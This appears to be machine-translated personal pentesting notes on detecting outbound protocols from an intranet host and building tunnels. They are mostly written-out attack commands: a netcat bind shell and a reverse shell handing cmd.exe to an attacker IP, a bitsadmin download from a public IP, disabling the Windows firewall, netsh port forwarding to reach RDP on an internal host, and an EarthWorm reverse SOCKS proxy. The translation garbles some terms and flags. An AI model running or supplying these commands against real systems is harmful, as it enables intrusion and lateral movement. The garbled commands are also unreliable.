1. Detecta el protocolo saliente del servidor de intranet
sistema de ventanas
1. Detección fuera de la red del protocolo icmp
Haga ping a la dirección IP de sus propios vps
2. Detección fuera de la red del protocolo DNS
ping www.baidu.com
nslookup www.baidu.com
3. Detección de TCP fuera de la red
telnet vps ip
2 , nc
Avión de ataque: nc -lvvp 4444
Máquina víctima: nc vps-ip 4444
3,
bitsadmin / rawreturn / transfer down "http://120.79.66.58/1.gif" d: \ 1.txt
4,
powershell -exec bypass Import-Module. \ telnet.ps1 Test-PortConnectivity -Source 'localhost' -RemoteDestination '192.168.3.69' -Port 110 -Iterate -protocol TCP
En segundo lugar, construya un túnel de protocolo
1. Reenvío de puertos de Netsh
Netsh es una herramienta que viene con Windows para administrar la configuración de red y el firewall de Windows. La conexión tcp entrante se puede reenviar al
puerto de la computadora local o remota a través de netsh .
Esta herramienta solo se puede utilizar con derechos administrativos.
Puede ver el reenvío existentenetsh interface portproxy show all
Agregue una asignación de puerto de IPV4 a IPV4 para netsh interface portproxy add v4tov4 listenport=22 connectaddress=ip connectport=port
eliminar el puerto de reenvío designadonetsh interface portproxy delete v4tov4 listenport=port
netsh advfirewall mostrar todos los perfiles Ver el estado del cortafuegos de todos los tipos de red en el sistema actual
netsh advfirewall establecer el estado de todos los perfiles desactivado Desactivar el cortafuegos del sistema actual
netsh advfirewall activar el estado de todos los perfiles Activar el cortafuegos del sistema actual
Crea un caparazón de avance:
1. Agregue una política de firewall para permitir el acceso externo al puerto 4444 a través del protocolo TCP
nombre de la regla: el nombre de la regla (cualquier nombre)
dir dirección acción (permitir, prohibir) protocolo: protocolo puerto local: puerto local
netsh advfirewall firewall agregar regla nombre = "nc en" dir = en acción = permitir protocolo = TCP puerto local = 4444
2. Cargue netcat-win32-1.12.zip en la máquina de destino, cambie al directorio y ejecute nc.exe -lvp 4444 -e cmd.exe
3. Ejecute nc64.exe -nv 192.168.206.129 4444 en la máquina atacante para obtener un shell directo
Crea un caparazón inverso:
Aviones de ataque
1. Agregue una política de firewall al atacante y abra el puerto 4443
Firewall netsh agregar portopening TCP 4443 "nc reverse shell"
2. El atacante monitorea el puerto 4443 nc64.exe -lvp 4443
Máquina objetivo
3. Agregue una política de firewall a la máquina de destino, permitiendo que el puerto 4443 pase el protocolo TCP
netsh advfirewall firewall agregar regla nombre = "nc reverse shell" dir = out action = permitir protocolo = TCP
localport = 4443
4. Utilice la herramienta nc cargada anteriormente en la máquina de destino para conectarse al puerto 4443 de la máquina atacante
nc64.exe -nv 192.168.206.1 4443 -e cmd.exe
5. El caparazón de la máquina objetivo se obtiene en la máquina atacante.
6. Aunque el enlace se ha establecido correctamente, no hay respuesta y no se puede ejecutar el comando.
7. A través de la investigación capa por capa, resulta que la máquina víctima es de 64 bits, por lo que se debe usar nc64.exe en lugar de nc.exe.
8. El atacante consiguió el caparazón de la víctima.
Puede ver que la máquina víctima utiliza el puerto 49169 para establecer un enlace con el puerto 4443 de la máquina de ataque. ESTABLECIDO (establecido) pid: 2560
CLOSE_WAIT La otra parte cerró activamente la conexión o la red es anormal y la conexión se interrumpe
9.tasklist / svc | findtr "2560" encontrado a través de pid es la conexión establecida por nc64.exe
10, consulta de proceso wmic información detallada del proceso
Puerto de servidor de zona militar de avance
Máquina de límites
1. Agregue una política de firewall a la máquina de borde para permitir que el puerto 8888 se conecte
netsh advfirewall firewall agregar regla nombre = "3389 prueba" dir = en acción = permitir protocolo = TCP puerto local = 8888
2. Agregue una política de firewall para reenviar el tráfico del acceso del atacante al puerto 8888 de la máquina fronteriza al puerto 33389 del host en la zona militar.
interfaz netsh portproxy agregar v4tov4 listenport = 8888 connectaddress = 192.168.52.129 connectport = 3389
3. Verifique las reglas de reenvío
netsh interface portproxy show all
(Eliminar las reglas de reenvío netsh interface portproxy delete v4tov4 listenport = 8888)
4. Compruebe si la máquina de borde está escuchando en el puerto 8888
Aviones de ataque
La operación que debe realizarse en la máquina atacante es muy simple, el puerto de inicio de sesión de escritorio remoto 8888 de la máquina de borde
Inicio de sesión exitoso en el servidor de winserver 2003 en la zona militar
192.168.206.129 es la dirección IP de la máquina de límites win7
reenvío de puertos iptables
No
ESE
Prueba de IP pública (no completada, inténtelo de nuevo todos los días)
(Mi vps es de 64 bits, busqué ew que piensa que no hay linux de 64 bits, muy vergonzoso)
1. Ver puertos abiertos de vps
firewall-cmd --list-port
2. Abra los puertos 6666 y 66667
firewall-cmd --zone = public --add-port = 6666 / tcp --permanent
firewall-cmd --zone = public --add-port = 6667 / tcp --permanent
3. Reinicie el firewall
4. Verifique si se enciende correctamente
5. El vps monitorea los puertos 6666 y 6667, la máquina atacante accede al puerto 6666 y la máquina de destino accede al puerto 6667.
./ew_linux_x64 -s rcsocks -l 6666 -e 6667 &
Servidor Rebound SOCKS v5
Avión de ataque: win7
Máquina de destino: winserver2003
1. Supervise los puertos 1080 y 888 del atacante
2. En la máquina de destino
3. Se ha establecido una conexión con el atacante.
4. Utilice SocksCap6 para la penetración posterior